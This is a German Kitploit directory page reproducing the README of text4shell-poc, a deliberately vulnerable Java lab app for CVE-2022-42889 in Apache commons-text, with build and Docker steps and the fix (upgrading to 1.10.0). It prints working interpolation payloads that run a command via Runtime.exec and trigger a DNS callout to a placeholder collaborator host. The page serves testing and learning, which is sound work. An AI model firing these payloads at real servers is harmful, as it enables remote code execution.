Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
text4shell-poc — Proof-of-Concept-Anwendung zum Testen von CVE-2022-42889 | Kitploit
Tools/GitHubGitHub/securekomodo/text4shell-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHubsecurekomodo/text4shell-poc

text4shell-poc

Proof-of-Concept-Anwendung zum Testen von CVE-2022-42889

Repository anzeigen
811vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2022-42889 PoC Testanwendung

Dies ist eine angreifbare Anwendung, die als Proof of Concept für die Schwachstelle CVE-2022-42889 entwickelt wurde.

Maven Installation

Um dies auszuführen, benötigen Sie:

  • JDK 17 oder höher
  • Maven
  1. Klonen Sie das Git-Repository
root@kitploit:~
git clone https://github.com/securekomodo/text4shell-poc.git
cd text4shell-poc
  1. Maven-Installation, um das JAR zu erstellen
root@kitploit:~
mvn clean install

Dadurch wird der Ordner ./target erstellt und in diesem Ordner sollte sich die JAR-Datei text4shell-poc-0.0.1-SNAPSHOT.jar befinden.

  1. Starten Sie den Webserver
root@kitploit:~
java -jar ./target/text4shell-poc-0.0.1-SNAPSHOT.jar

Dadurch wird ein Webserver auf Ihrem localhost gestartet, der standardmäßig auf Port 8080 lauscht.

  1. Rufen Sie den Webserver auf
root@kitploit:~
http://localhost:8080/

und Sie sollten die folgende Ausgabe sehen:

root@kitploit:~
Text4Shell POC Test -@securekomodo
Send payloads to /reflected?poc=yourpayload
OR Send payloads to /blind with payload as your userAgent
  1. Führen Sie den Exploit manuell aus oder führen Sie einen Scan mit text4shell-scan durch

Beispielhafte Exploit-Payloads

root@kitploit:~
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/itworked')}
root@kitploit:~
${dns:<burp collaborator host>)}

Empfohlener URL-Encoder für eine erfolgreiche Exploit-Demonstration: https://www.urlencoder.org/.

Docker

Alternativ können Sie Docker verwenden, um dieses PoC auszuführen:

  1. Klonen Sie das Git-Repository
root@kitploit:~
git clone https://github.com/securekomodo/text4shell-poc.git
cd text4shell-poc
  1. Docker-Build
root@kitploit:~
docker build --tag=text4shell-poc .
  1. Docker-Ausführung
root@kitploit:~
docker run -p 80:8080 text4shell-poc
  1. Testen Sie die angreifbare Anwendung
root@kitploit:~
http://localhost/
  1. Der Angriff kann durch Übergabe einer Zeichenkette „${prefix:name}“ wie unten gezeigt durchgeführt werden:
root@kitploit:~
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}
root@kitploit:~
${dns:<burp collaborator host>)}

Empfohlener URL-Encoder für eine erfolgreiche Exploit-Demonstration: https://www.urlencoder.org/.

Alternativ können Sie die Wirksamkeit von Scanning-Tools wie text4shell-scan überprüfen

Sind Sie verwundbar?

Damit Ihr Code verwundbar ist, müssen Sie:

  • Eine Version von Apache commons-text von Version 1.5.0 bis (ausschließlich) 1.10.0 ausführen
  • Interpolation für Ihre StringSubstituion verwenden (siehe https://commons.apache.org/proper/commons-text/apidocs/org/apache/commons/text/StringSubstitutor.html) – beachten Sie, dass dies nicht sehr verbreitet ist

Der Fix

Der Fix besteht darin, Ihre Instanzen von commons-text auf Version 1.10.0 oder höher zu aktualisieren.

Autor

Bryan Smith

  • Twitter: https://twitter.com/securekomodo
Tool herunterladen